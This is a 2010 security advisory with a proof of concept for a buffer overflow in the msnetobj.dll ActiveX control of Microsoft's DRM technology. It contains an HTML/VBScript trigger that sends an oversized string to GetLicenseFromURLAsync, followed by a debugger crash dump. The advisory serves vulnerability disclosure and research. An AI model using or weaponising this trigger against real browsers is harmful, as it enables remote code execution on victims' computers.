============================================================================================
Microsoft DRM technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities
===========================================================================================
by
Asheesh Kumar Mani Tripathi
# Vulnerability Discovered By Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company www.aksitservices.co.in
# Credit by Asheesh Anaconda
# Date 18th Sep 2010
# Description: Microsoft DRM technology (msnetobj.dll) ActiveX suffers from multiple remote vulnerabilities
such as buffer overflow, integer overflow and denial of service (IE crash). This issue is
triggered when an attacker convinces a victim user to visit a malicious website.
The "GetLicenseFromURLAsync" function does not handle input correctly.
Remote attackers may exploit this issue to execute arbitrary machine code in the context of
the affected application, facilitating the remote compromise of affected computers. Failed
exploit attempts likely result in browser crashes.
=============================================Proof Of Concept=============================================
<object classid='clsid:A9FC132B-096D-460B-B7D5-1DB0FAE0C062' id='RM' />
<script language='vbscript'>
targetFile = "C:\Windows\System32\msnetobj.dll"
prototype = "Sub GetLicenseFromURLAsync ( ByVal bstrXMLDoc As String , ByVal bstrURL As String )"
memberName = "GetLicenseFromURLAsync"
progid = "MSNETOBJLib.RMGetLicense"
argCount = 2
arg1="defaultV"
arg2=String(8212, "A")
RM.GetLicenseFromURLAsync(arg1 ,arg2)
</script>
=============================================Exception details=============================================
Exception Code: ACCESS_VIOLATION
Disasm: 77BEEA7F MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
Seh Chain:
--------------------------------------------------
1 76E7E47D msvcrt.dll
2 77BB99FA ntdll.dll
Called From Returns To
--------------------------------------------------
ntdll.77BEEA7F ntdll.77BEE9D9
ntdll.77BEE9D9 KERNEL32.770E7F75
KERNEL32.770E7F75 ole32.779EB3E1
ole32.779EB3E1 ole32.779EB50A
ole32.779EB50A ole32.779AF6F6
ole32.779AF6F6 ole32.779AF794
ole32.779AF794 msnetobj.6B823726
msnetobj.6B823726 msnetobj.6B823814
msnetobj.6B823814 msnetobj.6B823C40
msnetobj.6B823C40 msnetobj.6B823FA7
msnetobj.6B823FA7 msnetobj.6B824513
msnetobj.6B824513 msnetobj.6B823A9D
msnetobj.6B823A9D msvcrt.76E82599
msvcrt.76E82599 msvcrt.76E826B3
msvcrt.76E826B3 KERNEL32.770ED0E9
KERNEL32.770ED0E9 ntdll.77BF19BB
ntdll.77BF19BB ntdll.77BF198E
Registers:
--------------------------------------------------
EIP 77BEEA7F
EAX 00000054
EBX 00032A78 -> Asc: GsHd(
ECX 00000000
EDX 00000004
EDI 035CEE28 -> 7FFD8000
ESI 6B821434
EBP 035CEE48 -> 035CEE90
ESP 035CEE0C -> 00032A78
Block Disassembly:
--------------------------------------------------
77BEEA68 PUSH EDI
77BEEA69 JNZ 77C25E3F
77BEEA6F TEST BYTE PTR [EBX+10],1
77BEEA73 JE 77C25E93
77BEEA79 MOV EAX,[EBX+18]
77BEEA7C LEA EDI,[EBP-20]
77BEEA7F MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI] <--- CRASH
77BEEA80 PUSH 77BEEABD
77BEEA85 MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
77BEEA86 PUSH 1C
77BEEA88 ADD EAX,EBX
77BEEA8A PUSH EDX
77BEEA8B MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
77BEEA8C PUSH EAX
77BEEA8D LEA EAX,[EBP-20]
ArgDump:
--------------------------------------------------
EBP+8 00032A78 -> Asc: GsHd(
EBP+12 6B821434
EBP+16 035CEEB0 -> 00000040
EBP+20 00000000
EBP+24 77AC1424 -> 779EBEC8
EBP+28 6B821434
Stack Dump:
--------------------------------------------------
35CEE0C 78 2A 03 00 08 00 15 C0 00 00 00 00 B0 EE 5C 03 [..............\.]
35CEE1C 04 00 00 00 34 14 82 6B 00 90 FD 7F 00 80 FD 7F [.......k........]
35CEE2C 44 EE 5C 03 01 6C BF 77 68 EE 5C 03 84 EE 5C 03 [D.\..l.wh.\...\.]
35CEE3C 88 EE 5C 03 80 EE 5C 03 92 59 7C 75 90 EE 5C 03 [..\...\..Y.u..\.]
35CEE4C D9 E9 BE 77 78 2A 03 00 34 14 82 6B B0 EE 5C 03 [...w.......k..\.]
ApiLog
--------------------------------------------------
***** Installing Hooks *****
7735d5c0 RegCreateKeyExA (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings,(null))
Debug String Log
--------------------------------------------------